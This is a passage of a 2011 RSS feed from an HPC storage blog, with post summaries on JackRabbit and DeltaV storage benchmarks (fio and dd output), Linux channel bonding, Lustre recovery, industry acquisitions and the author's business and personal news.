      <description>Detroit Edison worked on it and got our office power up in 24 hours. Our house (where this server is located) &amp;hellip; not so happy. Didn&amp;rsquo;t come back on until afternoon today. That was fun. [update] &amp;hellip; and all the updating I&amp;rsquo;ve done has managed to bork the views counter. So its gonna look like we don&amp;rsquo;t get lots of traffic here. Will see if I can reconstruct this, but its a low priority item .</description>
    </item>
    
    <item>
      <title>Scanning backing store for a cluster file system</title>
      <link>https://blog.scalability.org/2011/07/scanning-backing-store-for-a-cluster-file-system/</link>
      <pubDate>Sun, 10 Jul 2011 20:03:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/scanning-backing-store-for-a-cluster-file-system/</guid>
      <description>Working on solving an issue for a customer. Wrote a backing store scanning tool for the job. Its gathering all manner of information and computing md5 sums. Right now it is single threaded, and as I am watching it run, it seems like I am using about 1/2 of the IO bandwidth (2 scans going at once on a machine). Will look at getting the scans going in parallel. Shouldn&amp;rsquo;t be hard (embarrassingly parallel problem).</description>
    </item>
    
    <item>
      <title>Project relampago: coming to siClusters, JackRabbits, and DeltaV&#39;s near you ...</title>
      <link>https://blog.scalability.org/2011/07/project-relampago-coming-to-siclusters-jackrabbits-and-deltavs-near-you/</link>
      <pubDate>Sun, 10 Jul 2011 05:03:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/project-relampago-coming-to-siclusters-jackrabbits-and-deltavs-near-you/</guid>
      <description>We&amp;rsquo;ve been working on some things, quietly, for a while. Almost &amp;hellip; almost ready to talk about this. Should have something to show at SC11 this year certainly. Working on tuning. Maybe a character flaw on my part, but I am never happy with performance. More soon. I promise &amp;hellip; (and yeah, been insanely busy, again).</description>
    </item>
    
    <item>
      <title>Note to self: use the sparse switch when moving data around with tar</title>
      <link>https://blog.scalability.org/2011/07/note-to-self-use-the-sparse-switch-when-moving-data-around-with-tar/</link>
      <pubDate>Wed, 06 Jul 2011 02:38:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/07/note-to-self-use-the-sparse-switch-when-moving-data-around-with-tar/</guid>
      <description>Using a tar pair to move data between two systems, over an NFS link. This is faster than over ssh (ssh isn&amp;rsquo;t a fast transport layer). Some user wrote a sparse file out. An 11PB sparse file. Which the tar happily &amp;hellip; happily I tell you !!! was trying to copy, in its entirety, over to the backup unit. Happily. Took me a quick look to see what was going on.</description>
    </item>
    
    <item>
      <title>Transformers ... shot in Michigan</title>
      <link>https://blog.scalability.org/2011/06/transformers-shot-in-michigan/</link>
      <pubDate>Tue, 28 Jun 2011 16:15:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/transformers-shot-in-michigan/</guid>
      <description>This was nice. The original movie in the series was shot downtown Detroit. Or at least the scenes towards the end (when they are duking it out in the city). It was funny to see the old railroad terminal building being used as a chase scene. FWIW, that building would make one helluva nice data center. Just needs to be cleaned up, with lots of AC/power added. Right next to a rail-road right of way.</description>
    </item>
    
    <item>
      <title>You win some, and you lose some</title>
      <link>https://blog.scalability.org/2011/06/you-win-some-and-you-lose-some/</link>
      <pubDate>Mon, 27 Jun 2011 19:08:08 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/you-win-some-and-you-lose-some/</guid>
      <description>Just found out the day job lost a major storage upgrade to a competitor. Read over the evaluations, and we had some questions, sent them off to the purchasing folks. Its always annoying to lose. But from losing you can gain knowledge of why you lost and hone your offerings or your bidding &amp;hellip; well &amp;hellip; most of the time you can. Sometimes, the process is engineered for a particular outcome, due to an effective manipulation of rankings.</description>
    </item>
    
    <item>
      <title>Updated DeltaV benchmarks, and a limited time discount offer</title>
      <link>https://blog.scalability.org/2011/06/updated-deltav-benchmarks/</link>
      <pubDate>Tue, 21 Jun 2011 15:35:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/updated-deltav-benchmarks/</guid>
      <description>Somewhat better tuning on this unit now. This is getting &amp;hellip; interesting. Very interesting. As a reminder, the day job&amp;rsquo;s lower cost storage target, the DeltaV is designed specifically to be a lower end machine. It is fast, and as we saw on the last set of numbers, it is actually faster than competitors hardware RAID. DeltaV does the RAID bits in software. So this is another (identical) unit to the one we tested before.</description>
    </item>
    
    <item>
      <title>There is a clear and present need for meaningful metrics for HPC and storage</title>
      <link>https://blog.scalability.org/2011/06/there-is-a-clear-and-present-need-for-meaningful-metrics-for-hpc-and-storage/</link>
      <pubDate>Tue, 21 Jun 2011 14:52:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/there-is-a-clear-and-present-need-for-meaningful-metrics-for-hpc-and-storage/</guid>
      <description>As the discussion of the amazing performance of the K machine continues, one needs to ask how well correlated the numbers are against end user realizable and likely performance. That is, how useful is top500 as an actual predictor of system performance for a particular task? Same question of Graph500, SPEC*, etc. ? How useful is Green500 at predicting power utilization and likely throughput of a specific design? Basically, I am not trying to minimize the efforts put into these.</description>
    </item>
    
    <item>
      <title>OT: Fun week ahead</title>
      <link>https://blog.scalability.org/2011/06/ot-fun-week-ahead/</link>
      <pubDate>Mon, 20 Jun 2011 18:40:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/ot-fun-week-ahead/</guid>
      <description>This is a personal bit. I am going up for belt promotion in Karate this Thursday. Huge risk saying something in advance in case I don&amp;rsquo;t make it. I am not worried about most of it. The fighting portion, yeah, a bit. I&amp;rsquo;m fine in sparring bouts, but this promises to be at least 7 fresh opponents, one after the other, with no rest for me. 2 minutes each opponent, and they run them from low to higher rank (the opponents get tougher at the end).</description>
    </item>
    
    <item>
      <title>&#34;K&#34; is atop the top500.  What does this mean to us?</title>
      <link>https://blog.scalability.org/2011/06/k-is-atop-the-top500-what-does-this-mean-to-us/</link>
      <pubDate>Mon, 20 Jun 2011 18:02:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/k-is-atop-the-top500-what-does-this-mean-to-us/</guid>
      <description>Not much. No, I am not trying to be a downer. The relation of the top500 top-o-the-heap to mere mortals with hard problems to solve isn&amp;rsquo;t very strong. Actually its quite weak. There is only one K machine. Its at RIKEN in Japan. There&amp;rsquo;s only one Jaguar, and only one Tihane machine. All are, to some degree or the other, unique in some aspects. What matters to most people is &amp;ldquo;what can it do for me&amp;rdquo;?</description>
    </item>
    
    <item>
      <title>Updated DeltaV in the lab</title>
      <link>https://blog.scalability.org/2011/06/updated-deltav-in-the-lab/</link>
      <pubDate>Wed, 15 Jun 2011 20:17:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/updated-deltav-in-the-lab/</guid>
      <description>Should be a pretty good performance bump for the unit. Processor and memory bump. Newer backplane. Some other bits. Will update soon. Really looking forward to the benchies :) [Update 1] Very encouraging sign: RAID build is occurring at about 2x the rate of the previous generation. Should be done with 48TB RAID build in about 7 more hours. The comparison to the hardware accelerated RAID should be made as well.</description>
    </item>
    
    <item>
      <title>One of the best compilers out there goes open source</title>
      <link>https://blog.scalability.org/2011/06/one-of-the-best-compilers-out-there-goes-open-source/</link>
      <pubDate>Mon, 13 Jun 2011 17:04:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/one-of-the-best-compilers-out-there-goes-open-source/</guid>
      <description>Pathscale makes some of the best C/C++/Fortran compilers on the market. And now, they are open source. Grab the bits while they are hot!</description>
    </item>
    
    <item>
      <title>Shakes head ...</title>
      <link>https://blog.scalability.org/2011/06/shakes-head/</link>
      <pubDate>Fri, 10 Jun 2011 17:26:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/shakes-head/</guid>
      <description>Them: Here is our parts list. We found it by going to these web sites (see long list) finding the lowest cost among them, and then adding it in to the spec. Me: Uh huh (noting the several conflicting and wrong elements). So what is it you are trying to do &amp;hellip; Them: Never mind that, this is our new machine, and it will do X &amp;hellip; [n.b. X is some magical realization of performance at the 99th percentile of the systems capability &amp;hellip; only would hit that if everything, and I mean EVERYTHING, was perfect.</description>
    </item>
    
    <item>
      <title>Fusion IO IPO tomorrow ... is the market for PCIe Flash strong enough to support 1 or more companies?</title>
      <link>https://blog.scalability.org/2011/06/fusion-io-ipo-tomorrow-is-the-market-for-pcie-flash-strong-enough-to-support-1-or-more-companies/</link>
      <pubDate>Wed, 08 Jun 2011 16:58:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/fusion-io-ipo-tomorrow-is-the-market-for-pcie-flash-strong-enough-to-support-1-or-more-companies/</guid>
      <description>FusionIO goes public tomorrow. If you are an early employee, chances are, you are going to be a millionaire by the end of the day, at least on paper. The author of the great &amp;ldquo;fio&amp;rdquo; tool works there, and I hope this does work out for him and the rest of them well. But &amp;hellip; my question is a longer term one. Does the market &amp;hellip; or will the market &amp;hellip; support a higher cost PCIe channel flash as opposed to lower cost SSD based units?</description>
    </item>
    
    <item>
      <title>How to channel bond in Linux</title>
      <link>https://blog.scalability.org/2011/06/how-to-channel-bond-in-linux/</link>
      <pubDate>Tue, 07 Jun 2011 21:36:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/how-to-channel-bond-in-linux/</guid>
      <description>Partner wants a 4 way bond on their unit. No problem.
[root@jr4-1 ~]# /opt/scalable/sbin/mkchbond.pl --bond=bond0 --eth=eth0,eth1,eth2,eth3 --ip=10.100.243.80 --netmask=255.255.0.0 --mode=0 --write mkchbond.pl: v0.9 Create channel bonds easily by Joe Landman (http://scalableinformatics.com) This software is Copyright (c) 2005-2007 by Scalable Informatics and licensed under GPL v2.0 only. You may freely distribute this software under the terms and conditions of the GPL 2.0 license. You may not alter, remove, or prevent printing of the copyright notice and information.</description>
    </item>
    
    <item>
      <title>Disappointed, but, I guess, not surprised</title>
      <link>https://blog.scalability.org/2011/06/disappointed-but-i-guess-not-surprised/</link>
      <pubDate>Mon, 06 Jun 2011 20:16:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/disappointed-but-i-guess-not-surprised/</guid>
      <description>Several years ago, we had an academic customer literally steal our time, our effort, our design, etc. for their system. The signals were there, and we didn&amp;rsquo;t pay attention to them. Something like that happened again, though this time we recognized it. Customer still is operating off the assumption that they got something for nothing, but &amp;hellip; well &amp;hellip; when they put their system together, discover that it doesn&amp;rsquo;t work, I expect a few probing emails.</description>
    </item>
    
    <item>
      <title>Why do companies erect unneeded barriers?</title>
      <link>https://blog.scalability.org/2011/06/why-do-companies-erect-unneeded-barriers/</link>
      <pubDate>Fri, 03 Jun 2011 21:25:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/why-do-companies-erect-unneeded-barriers/</guid>
      <description>This is about the business side, and AMEX in particular. A customer bought something. Paid for it on AMEX. We use Authorize.Net, as do many people. It handles the card processing for us. Makes our life easy. But it doesn&amp;rsquo;t do AMEX directly, AMEX does AMEX. And they don&amp;rsquo;t play well with Authorize.Net. So now we are in the position of having to decline this AMEX transaction, and remove AMEX from our accepted card list, because AMEX is more interested in wasting my time and erecting barriers to doing business, than actually doing business.</description>
    </item>
    
    <item>
      <title>What are xfs&#39;s real limits?</title>
      <link>https://blog.scalability.org/2011/06/what-are-xfss-real-limits/</link>
      <pubDate>Fri, 03 Jun 2011 05:40:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/06/what-are-xfss-real-limits/</guid>
      <description>Over at Enterprise Storage Forum, Henry Newman and Jeff Layton started a conversation that needs to be shared. This is a very good article. In it, they reproduced a table comparing file systems coming from this page at Redhat. This is really showing a comparison of what the &amp;ldquo;limits&amp;rdquo; are in a theoretical or practical sense between the various versions of RHEL platforms. The file system table compares what you can do in each version.</description>
    </item>
    
    <item>
      <title>Working on a few new things ...</title>
      <link>https://blog.scalability.org/2011/05/working-on-a-few-new-things/</link>
      <pubDate>Fri, 27 May 2011 05:19:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/working-on-a-few-new-things/</guid>
      <description>ok, some of these are riffs on our older things, but they are very exciting to everyone we speak with. Need a chassis mod for one of them. The other is &amp;hellip; well &amp;hellip; an extension of an earlier idea. Been doing some testing with it, and its working out far better than I had thought. Sorry for being so vague. I don&amp;rsquo;t want to let these cats out of the bag &amp;hellip; yet икони</description>
    </item>
    
    <item>
      <title>OT:  been very busy ...</title>
      <link>https://blog.scalability.org/2011/05/ot-been-very-busy/</link>
      <pubDate>Wed, 25 May 2011 18:03:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/ot-been-very-busy/</guid>
      <description>Good version of busy; lots of quotes, orders, builds, &amp;hellip;. A new market has emerged for us, one I wasn&amp;rsquo;t sure how to break into, that looks like it is going to do good things for us. Entrenched expensive and slow competitor, everyone looking for better systems. Should be interesting coupla months. I hope I get time for a vacation in there somewhere.</description>
    </item>
    
    <item>
      <title>OT:  Just played with Google Docs ...</title>
      <link>https://blog.scalability.org/2011/05/ot-just-played-with-google-docs/</link>
      <pubDate>Mon, 23 May 2011 05:41:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/ot-just-played-with-google-docs/</guid>
      <description>Wow &amp;hellip; uploaded a presentation I was working on for a customer and it worked well. Rendered everything correctly (OpenOffice doesn&amp;rsquo;t always do that). Anyone else using Google Docs on a more or less professional/constant basis? Any outage issues? Compatibility issues? I like OpenOffice, but its occasional glitches and &amp;hellip; er &amp;hellip; interpretive re-renderings of Powerpoints are &amp;hellip; er &amp;hellip; amusing. The downside to Google docs are storage offsite, privacy/security issues, and access in the event of a network outage.</description>
    </item>
    
    <item>
      <title>OT:  heh ... nice to see people resuming a healthy skepticism</title>
      <link>https://blog.scalability.org/2011/05/ot-heh-nice-to-see-people-resuming-a-healthy-skepticism/</link>
      <pubDate>Tue, 17 May 2011 21:21:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/ot-heh-nice-to-see-people-resuming-a-healthy-skepticism/</guid>
      <description>See here . money quote
My gosh &amp;hellip; a follow the money mystery? Who woulda thunk it? At any rate, its good to see people resume the healthy skepticism that is needed for real scientific inquiry and advancement. Science is never settled, and anyone telling you otherwise is trying to sell you something. Sure enough, some of those doing the selling have a strong economic incentive for doing so. Go figure.</description>
    </item>
    
    <item>
      <title>... and Sandisk swallows Pliant ...</title>
      <link>https://blog.scalability.org/2011/05/and-sandisk-swallows-pliant/</link>
      <pubDate>Tue, 17 May 2011 05:40:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/and-sandisk-swallows-pliant/</guid>
      <description>This is interesting. SANdisk now has an enterprise play. Flash is getting more interesting. Basically creating the same sort of sea change in storage that GPUs created in computing.</description>
    </item>
    
    <item>
      <title>Still struggling with half-open and otherwise broken drivers</title>
      <link>https://blog.scalability.org/2011/05/still-struggling-with-half-open-and-otherwise-broken-drivers/</link>
      <pubDate>Mon, 16 May 2011 20:54:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/still-struggling-with-half-open-and-otherwise-broken-drivers/</guid>
      <description>We have a nice pair of Qlogic 7220 DDR HCAs in house. Direct connecting a pair of machines for a simple point to point bit. Using our updated 2.6.32.39.scalable kernel. Want to set up SRP target. So we have to get OFED compiled. Need 1.5.3+ due to their &amp;hellip; er &amp;hellip; issues tracking kernels. Basically the OFED build process is an abuse &amp;hellip; a very severe one &amp;hellip; of the RPM process.</description>
    </item>
    
    <item>
      <title>Updated JackRabbit JR5 results</title>
      <link>https://blog.scalability.org/2011/05/updated-jackrabbit-jr5-results/</link>
      <pubDate>Mon, 09 May 2011 02:10:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/updated-jackrabbit-jr5-results/</guid>
      <description>Lab machine, updated RAID system (to our current shipping specs). We&amp;rsquo;ve got a 10GbE and an IB DDR card in there for some end user lab tests over the next 2 weeks. We just finished rebuilding the RAID unit, and I wanted a baseline measurement. So a fast write then read (uncached of course).
[root@jr5-lab fio]# fio sw.fio ... Run status group 0 (all jobs): WRITE: io=195864MB, aggrb=3789.1MB/s, minb=3880.1MB/s, maxb=3880.1MB/s, mint=51680msec, maxt=51680msec  Thats the write.</description>
    </item>
    
    <item>
      <title>IT storage</title>
      <link>https://blog.scalability.org/2011/05/it-storage/</link>
      <pubDate>Fri, 06 May 2011 04:27:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/it-storage/</guid>
      <description>They see a shiny new storage chassis with 6G backplane. They fill it with &amp;ldquo;fast&amp;rdquo; drives, and build &amp;ldquo;raids&amp;rdquo; using integrated RAID platforms. They insist it should be fast, showing calculations that suggest that it should sustain near theoretical max performance on IO. Yet, the reality is that its 1/10th to 1/20th the theoretical max performance. Whats going on? In the past, I&amp;rsquo;ve railed against &amp;ldquo;IT clusters&amp;rdquo; &amp;hellip; basically clusters designed, built, and operated by IT staff unfamiliar with how HPC systems worked.</description>
    </item>
    
    <item>
      <title>Unbelievable</title>
      <link>https://blog.scalability.org/2011/05/unbelievable/</link>
      <pubDate>Fri, 06 May 2011 04:08:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/05/unbelievable/</guid>
      <description>A system designed to fail often will. Seen this a few times this past week. In one case, someone agrees that we we do and our machines have value, but want our stuff without paying us for our stuff. They don&amp;rsquo;t want to buy them. They just want us to tell them how to build them. They don&amp;rsquo;t want to buy our stuff, even though we&amp;rsquo;ve demonstrated that our systems solve their problem.</description>
    </item>
    
    <item>
      <title>Interesting acquisition:  STEC takes KQ Infotech (assets)</title>
      <link>https://blog.scalability.org/2011/04/interesting-acquisition-stec-takes-kq-infotech-assets/</link>
      <pubDate>Wed, 27 Apr 2011 02:20:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/interesting-acquisition-stec-takes-kq-infotech-assets/</guid>
      <description>I wasn&amp;rsquo;t expecting this one. KQ Infotech, a smaller development house probably best known for their porting of ZFS to Linux, and providing the tools required for end users to build their own ZFS on their own machines (thus getting around some of the major hurdles with GPL and CDDL licenses). I was not expecting this, though to be honest, we&amp;rsquo;ve seen some pretty interesting M&amp;amp;A; bits over the last 2-4 weeks.</description>
    </item>
    
    <item>
      <title>Ok, this is just showing off now ...</title>
      <link>https://blog.scalability.org/2011/04/ok-this-is-just-showing-off-now/</link>
      <pubDate>Thu, 21 Apr 2011 20:56:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/ok-this-is-just-showing-off-now/</guid>
      <description>One of the two units we are going to ship to a customer very soon. Running the 19.2TB write. Fill up 1/2 the system. With a single file. Of 19.2TB size. In less than 2 hours. Don&amp;rsquo;t try this on ext*.
[root@jr5-1 ~]# fio sw-19.2TB.fio ... Run status group 0 (all jobs): WRITE: io=19200GB, aggrb=3160.7MB/s, minb=3235.1MB/s, maxb=3235.1MB/s, mint=6221566msec, maxt=6221566msec [root@jr5-1 ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/md0 44G 5.</description>
    </item>
    
    <item>
      <title>Raw, unapologetic, firepower</title>
      <link>https://blog.scalability.org/2011/04/raw-unapologetic-firepower/</link>
      <pubDate>Tue, 19 Apr 2011 13:34:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/raw-unapologetic-firepower/</guid>
      <description>96TB Scalable Informatics JackRabbit JR5 unit, shipping out to a customer today (or early tomorrow). These are single thread, single process, single file writes. Taking it out to the track and cracking the throttle, wide open.
[root@jr5-2 ~]# fio sw.fio ... Run status group 0 (all jobs): WRITE: io=65028MB, aggrb=3801.1MB/s, minb=3893.2MB/s, maxb=3893.2MB/s, mint=17104msec, maxt=17104msec [root@jr5-2 ~]# fio sr.fio ... Run status group 0 (all jobs): READ: io=65028MB, aggrb=3257.2MB/s, minb=3335.3MB/s, maxb=3335.3MB/s, mint=19965msec, maxt=19965msec  and the 1TB run</description>
    </item>
    
    <item>
      <title>... and Seagate snarfs up Samsung&#39;s drive business ...</title>
      <link>https://blog.scalability.org/2011/04/and-seagate-snarfs-up-samsungs-drive-business/</link>
      <pubDate>Tue, 19 Apr 2011 11:46:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/and-seagate-snarfs-up-samsungs-drive-business/</guid>
      <description>Looks like Seagate got itself some spinpoints. Seagate may be leveraging this to build its way into the Chinese market more than it is. Now there are 3 big spinning rust makers: Seagate, Western Digital, and Toshiba. A Seagate-Toshiba hookup wouldn&amp;rsquo;t surprise me, though the regulators are likely to start eyeing this stuff more closely for anti-monopoly reasons. I&amp;rsquo;ve said more M&amp;amp;A; and I mean&amp;rsquo;t more M&amp;amp;A.; And the deals ain&amp;rsquo;t done yet.</description>
    </item>
    
    <item>
      <title>Ignore the spork behind the curtain ...</title>
      <link>https://blog.scalability.org/2011/04/ignore-the-spork-behind-the-curtain/</link>
      <pubDate>Mon, 18 Apr 2011 18:05:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/ignore-the-spork-behind-the-curtain/</guid>
      <description>At InsideHPC, Rich notes in a post
Heh &amp;hellip; I&amp;rsquo;d argue that the (sp)fork already happened, its in the past, and people have decided to continue moving forward with the new (sp)fork. This said, this is decidedly not a bad thing. As I had predicted, Oracle has largely abandoned all things HPC that it couldn&amp;rsquo;t remission for some other decidedly non-HPC purpose. The only realistic reason for retaining ownership of the Lustre IP/copyrights/etc.</description>
    </item>
    
    <item>
      <title>file system surgery on borked Lustre volumes</title>
      <link>https://blog.scalability.org/2011/04/file-system-surgery/</link>
      <pubDate>Sat, 16 Apr 2011 15:36:41 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/file-system-surgery/</guid>
      <description>So whatcha gonna do when you have a Lustre file system, with an ext4 backing store with a journal on an external RAID1 SSD, when that external RAID1 ssd pair goes away (in a non-recoverable manner), and the file system has the needs_recovery flag set? You see, the &amp;lsquo;-f&amp;rsquo; option to e2fsck &amp;hellip; doesn&amp;rsquo;t &amp;hellip; in the face of a missing external journal with needs_recovery set. Ok, you can turn off the journal.</description>
    </item>
    
    <item>
      <title>On the broken-ness of most Linux distributions ...</title>
      <link>https://blog.scalability.org/2011/04/on-the-broken-ness-of-most-linux-distributions/</link>
      <pubDate>Sat, 16 Apr 2011 06:02:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/on-the-broken-ness-of-most-linux-distributions/</guid>
      <description>If you have anything approaching a complex installation or management requirement for your systems, most &amp;hellip; no &amp;hellip; pretty much all Linux distributions have anywhere between somewhat borked to completely boneheaded designs for handling these complex sitatuations. Say, for example, you want to boot a diskless NFS system, and replicate it. Diskless NFS is well known to be an easy to manage scenario &amp;hellip; one system to manage, very scalable from an admin point of view.</description>
    </item>
    
    <item>
      <title>At NAB in Las Vegas ...  in a word ... wow!!!</title>
      <link>https://blog.scalability.org/2011/04/at-nab-in-las-vegas-in-a-word-wow/</link>
      <pubDate>Wed, 13 Apr 2011 04:39:17 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/at-nab-in-las-vegas-in-a-word-wow/</guid>
      <description>I&amp;rsquo;ve got a much longer writeup in mind. Those who attend SCxx and think its big &amp;hellip; er &amp;hellip; no. Conservative guess that NAB is 5x the size of SCxx in terms of exhibit floor space. This may be an under estimate by 2-4x BTW, I&amp;rsquo;ve only visited the upper and lower south exhibit hall areas. Not the central or north exhibit halls. And, to add insult to injury &amp;hellip; the entire SCxx floor would fit in 1/2 of one of the upper or lower floor levels.</description>
    </item>
    
    <item>
      <title>Another test case on a 5U JackRabbit</title>
      <link>https://blog.scalability.org/2011/04/another-test-case-on-a-5u-jackrabbit/</link>
      <pubDate>Mon, 11 Apr 2011 18:20:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/another-test-case-on-a-5u-jackrabbit/</guid>
      <description>This is the other 5U JackRabbit unit we are building for the customer. Single thread read of an large file, no caching. This is spinning rust (e.g. hard disk). This uses 2TB drives while the other unit uses 1TB drives. The theoretical maximum we could pull data off these units the way they are arranged now is 4.68 GB/s with these particular drives.
[root@jr5-2 ~]# dd of=/dev/null if=/data/big.file ... 1024+0 records in 1024+0 records out 137438953472 bytes (137 GB) copied, 29.</description>
    </item>
    
    <item>
      <title>Not all clouds have silver linings ...</title>
      <link>https://blog.scalability.org/2011/04/not-all-clouds-have-silver-linings/</link>
      <pubDate>Mon, 11 Apr 2011 16:40:11 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/not-all-clouds-have-silver-linings/</guid>
      <description>AaaS/StaaS (Archive as a service, Storage as a service) seems to have providers dropping their offerings as they are not very profitable. As with computing as a service, the issues are costs, pure and simple. For this to work well as a service, you, the provider, need your costs to be well below what you charge your customers. Moreover, the cost you charge your customers needs to be below their entire burdened costs for replicating the same thing in house.</description>
    </item>
    
    <item>
      <title>The TB sprint ... 12.4 TB/hour write speed</title>
      <link>https://blog.scalability.org/2011/04/the-tb-sprint-12-4-tbhour-write-speed/</link>
      <pubDate>Fri, 08 Apr 2011 14:29:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/the-tb-sprint-12-4-tbhour-write-speed/</guid>
      <description>канализацияWe wanted to see what one of the current gen machines could do for writing and reading a 1TB (1000GB) sized file. So we set up a simple fio deck to do this. Then ran it.
Run status group 0 (all jobs): WRITE: io=999.78GB, aggrb=3535.7MB/s, minb=3620.6MB/s, maxb=3620.6MB/s, mint=289552msec, maxt=289552msec  The write took 289.6 seconds. Less than 5 minutes, or 12.4 TB/hour write speed. The read
Run status group 0 (all jobs): READ: io=999.</description>
    </item>
    
    <item>
      <title>Now thats what I&#39;m talking about ...</title>
      <link>https://blog.scalability.org/2011/04/now-thats-what-im-talking-about/</link>
      <pubDate>Thu, 07 Apr 2011 12:29:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/04/now-thats-what-im-talking-about/</guid>
      <description>New JackRabbit JR5 in lab (actually a pair of them) being built for a customer. Running some real simple baseline tests. Very simple stuff. RAID6. dd.
[root@jr5-1 ~]# dd if=/dev/zero of=/data/big.file ... 1250+0 records in 1250+0 records out 83886080000 bytes (84 GB) copied, 26.4774 seconds, 3.2 GB/s  and a quicky-dirty fio run &amp;hellip;
Run status group 0 (all jobs): WRITE: io=128004MB, aggrb=3336.4MB/s, minb=3416.4MB/s, maxb=3416.4MB/s, mint=38367msec, maxt=38367msec  and the read version</description>
    </item>
    
    <item>
      <title>Day job at 2011 High Performance Computing Linux Financial Markets on Monday 4-April</title>
      <link>https://blog.scalability.org/2011/03/day-job-at-2011-high-performance-computing-linux-financial-markets-on-monday-4-april/</link>
      <pubDate>Thu, 31 Mar 2011 21:07:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/day-job-at-2011-high-performance-computing-linux-financial-markets-on-monday-4-april/</guid>
      <description>We will be there, with 2 machines in a booth with our partner JRTI/XCT. We are featuring Flash hardware from Virident and showing a demo (or set of demos) on very high performance data analysis using kdb+ Scalable gear will include a JackRabbit JR4 unit with 2x Virident TachIOn cards (think drool-worthy 1GB/s 300k IOP cards &amp;hellip; ). Everything in the JR4 is new, apart from the disks &amp;hellip; which are older/slower (what we had on hand).</description>
    </item>
    
    <item>
      <title>Pot ... kettle ... yeah, something like this</title>
      <link>https://blog.scalability.org/2011/03/pot-kettle-yeah-something-like-this/</link>
      <pubDate>Thu, 31 Mar 2011 12:06:34 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/pot-kettle-yeah-something-like-this/</guid>
      <description>I think this news story is a day early. It has all the requisite gems in it.
My gosh, for a moment, I thought Microsoft was talking about itself in the PC market. Then I saw the words &amp;ldquo;Google&amp;rdquo; and &amp;ldquo;e-book&amp;rdquo;. Now if we changed those to &amp;ldquo;Microsoft&amp;rdquo; and &amp;ldquo;PC&amp;rdquo;, yeah, that statement would also be true. Are we sure this isn&amp;rsquo;t the first of April?</description>
    </item>
    
    <item>
      <title>Something we are working on</title>
      <link>https://blog.scalability.org/2011/03/something-we-are-working-on/</link>
      <pubDate>Mon, 28 Mar 2011 21:26:55 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/something-we-are-working-on/</guid>
      <description>Ignore some of the ugly table bits to the left. Still working on the screen layout, menu look/feel, etc. But you can get a sense of what we are doing. This will appear at the HPC Linux on Wall Street show with us next week, as we will be running demos from this (and showing to a few prospective partners/customers at NAB in Las Vegas). Please feel free to stop by if you are in NYC for the show &amp;hellip; Many of the functions are not fully hooked to the controllers yet, but you will get the idea.</description>
    </item>
    
    <item>
      <title>Hilarious startup robot pitches a VC ...</title>
      <link>https://blog.scalability.org/2011/03/hilarious-startup-robot-pitches-a-vc/</link>
      <pubDate>Fri, 25 Mar 2011 14:36:18 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/hilarious-startup-robot-pitches-a-vc/</guid>
      <description>As seen on InsideHPC in a post
Ok &amp;hellip; a long time ago I posted a somewhat silly post, briefly lampooning the VC&amp;rsquo;s penchants for crowd-funding ideas that were buzzword heavy (and, ahem &amp;hellip; value-lite &amp;hellip; ahem), whilst ignoring real innovation, real markets, real companies. This video does a similar type of lampooning, and it is, sadly, on the money. If we were pitching the day job as a &amp;ldquo;Social network, and crowd source content and media data repository&amp;rdquo; rather than as a &amp;ldquo;high performance storage and computing solutions&amp;rdquo; company &amp;hellip; yeah &amp;hellip; chances are we&amp;rsquo;d get much more interest from that community.</description>
    </item>
    
    <item>
      <title>Oracle dumps Itanic</title>
      <link>https://blog.scalability.org/2011/03/oracle-dumps-itanic/</link>
      <pubDate>Thu, 24 Mar 2011 01:35:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2011/03/oracle-dumps-itanic/</guid>
      <description>You can sort of see this coming. Oracle is ditching Itanium development, effective immediately. If they haven&amp;rsquo;t done so for Power &amp;hellip; yet &amp;hellip; I&amp;rsquo;d expect this soon as well. Oracles&#39; claim is that Intel is ditching Itanium. Well, yeah, its sort of a weak argument. The future of Intel isn&amp;rsquo;t much on the Itanium side of things. x86 and derivatives appear to be their future, but Itanium isn&amp;rsquo;t being deep sixed now.</description>
    </item>
